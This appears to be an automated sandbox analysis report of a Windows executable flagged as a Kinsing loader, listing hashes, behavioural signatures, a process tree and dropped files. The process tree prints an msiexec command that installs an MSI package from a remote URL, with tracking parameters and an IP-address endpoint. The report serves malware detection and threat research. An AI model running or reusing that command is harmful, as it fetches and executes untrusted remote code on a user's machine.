kinsing | 238566fb0529aec665f541b834c35cfdae07a8c7947f1460c82d46775268b45e

Analysis

max time kernel
142s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
25-01-2024 16:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

74f34c3e1552bf43f022980bf004a189.exe
Size

1.4MB
MD5

74f34c3e1552bf43f022980bf004a189
SHA1

780d691ffdbd7862e1a5e1f21728a1743c8a8faf
SHA256

238566fb0529aec665f541b834c35cfdae07a8c7947f1460c82d46775268b45e
SHA512

dc245473913e9a39c368927df216eeb08c125788c2b0a90a12b353119f54709500c7ea73ed60785e9328175ce9d541cb8da6856133b1284f783ec2f2e86ca4fe
SSDEEP

24576:MaQPI4OCa++/AmvCbEVoqG/5T1XCxMbwSPcocLCcnlUVy5vwDHl/nMM:MaeOCRTzvmMJf/kF5IlvMM

Score

10^/10

kinsing loader

Malware Config

Signatures

Kinsing
Kinsing is a loader written in Golang.
loader kinsing
Executes dropped EXE 1 IoCs

Processes:

~nr98w8amjp.tmp

pid process

1316 ~nr98w8amjp.tmp
Use of msiexec (install) with remote resource 1 IoCs

Processes:

MSIEXEC.EXE

pid process

3228 MSIEXEC.EXE
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

MSIEXEC.EXE

description pid process

Token: SeShutdownPrivilege 3228 MSIEXEC.EXE
Token: SeIncreaseQuotaPrivilege 3228 MSIEXEC.EXE
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

MSIEXEC.EXE

pid process

3228 MSIEXEC.EXE
3228 MSIEXEC.EXE

pid	process
1316	~nr98w8amjp.tmp

pid	process
3228	MSIEXEC.EXE

description	pid	process
Token: SeShutdownPrivilege	3228	MSIEXEC.EXE
Token: SeIncreaseQuotaPrivilege	3228	MSIEXEC.EXE

pid	process
3228	MSIEXEC.EXE
3228	MSIEXEC.EXE

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

74f34c3e1552bf43f022980bf004a189.exe~nr98w8amjp.tmp

description	pid	process	target process
PID 2724 wrote to memory of 1316	2724	74f34c3e1552bf43f022980bf004a189.exe	~nr98w8amjp.tmp
PID 2724 wrote to memory of 1316	2724	74f34c3e1552bf43f022980bf004a189.exe	~nr98w8amjp.tmp
PID 2724 wrote to memory of 1316	2724	74f34c3e1552bf43f022980bf004a189.exe	~nr98w8amjp.tmp
PID 1316 wrote to memory of 3228	1316	~nr98w8amjp.tmp	MSIEXEC.EXE
PID 1316 wrote to memory of 3228	1316	~nr98w8amjp.tmp	MSIEXEC.EXE
PID 1316 wrote to memory of 3228	1316	~nr98w8amjp.tmp	MSIEXEC.EXE

C:\Users\Admin\AppData\Local\Temp\74f34c3e1552bf43f022980bf004a189.exe
"C:\Users\Admin\AppData\Local\Temp\74f34c3e1552bf43f022980bf004a189.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2724

C:\Users\Admin\AppData\Local\Temp\~nr98w8amjp.tmp
"C:\Users\Admin\AppData\Local\Temp\~nr98w8amjp.tmp"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1316

C:\Windows\SysWOW64\MSIEXEC.EXE
MSIEXEC.EXE /i "http://pliuht.cdnpckgs.eu/client/pkgs/viplounge/RubySlots20141207074451.msi" DDC_DID=2714691 DDC_RTGURL=http://www.cdnfile.eu/dl/TrackSetup/TrackSetup.aspx?DID=2714691 DDC_DOWNLOAD_AFFID=3952 DDC_UPDATESTATUSURL=http://190.4.94.34:8080/vip/Lobby.WebServices/Installer.asmx CUSTOMNAME02=trackingID CUSTOMVALUE02=VIPL510109445b5bfef11a530307181dc86a SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp" SETUPEXENAME="~nr98w8amjp.tmp"
3⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3228

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_is6BFD.tmp
Filesize
1KB

MD5
c0cd17bb2a0ee8e7f04b9be37d3b655e

SHA1
226158b0fe0b9f43934db00c3de55124817bb576

SHA256
d505674bb93449b64b35407881dd291c19eee951fac46b281820a9cdc448b741

SHA512
41d9d87d66606e7e79746111ad512b992a396c8fc6b73ef490c4b910ec1f77b2c52f4ac639870533d33b50bd464688817702bb04340d3872c66ad7f9b7bd8293

Download Submit
C:\Users\Admin\AppData\Local\Temp\{18E4506F-70E9-4B71-B3C6-108B24EE20B4}\0x0409.ini
Filesize
21KB

MD5
be345d0260ae12c5f2f337b17e07c217

SHA1
0976ba0982fe34f1c35a0974f6178e15c238ed7b

SHA256
e994689a13b9448c074f9b471edeec9b524890a0d82925e98ab90b658016d8f3

SHA512
77040dbee29be6b136a83b9e444d8b4f71ff739f7157e451778fb4fccb939a67ff881a70483de16bcb6ae1fea64a89e00711a33ec26f4d3eea8e16c9e9553eff

Download Submit
C:\Users\Admin\AppData\Local\Temp\{18E4506F-70E9-4B71-B3C6-108B24EE20B4}\_ISMSIDEL.INI
Filesize
20B

MD5
db9af7503f195df96593ac42d5519075

SHA1
1b487531bad10f77750b8a50aca48593379e5f56

SHA256
0a33c5dffabcf31a1f6802026e9e2eef4b285e57fd79d52fdcd98d6502d14b13

SHA512
6839264e14576fe190260a4b82afc11c88e50593a20113483851bf4abfdb7cca9986bef83f4c6b8f98ef4d426f07024cf869e8ab393df6d2b743b9b8e2544e1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~6BFA.tmp
Filesize
5KB

MD5
81d935c8c9c2b9246d9a06653bc7aa1f

SHA1
473dc10a9bccaa6b408501ea88b83a0a18ee6d68

SHA256
d8845bb14ab2f37edadd7059d61ffa8774e8c0178da9032671af88ab4e6f3d47

SHA512
cb06e0e233e2de609c4bb8680a8fc580d3bee96d864e603398484574d2e4b1b40f5b68db17c8ed90643fb9873e136d15fa3aac797b9300c378036644ce7323bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\~nr98w8amjp.tmp
Filesize
1.2MB

MD5
5a410730532bae4283535aed4bb9786a

SHA1
c7d86402ea6794b6c3b45c1a4842df7435f96d5a

SHA256
7c3fa3f12528d4676b941a5b72130e69de821b8a3c89dc8a8679b74c0aa8c9df

SHA512
254b7f2c923c08f5a3965f093f5700ffdf78c2d84fc3fe39dba653c9d6b6716d6c85df1f9ed8d4561cc3e03c202b625209ea607c5a3dc78c64cdb9885d44d4ca

Download Submit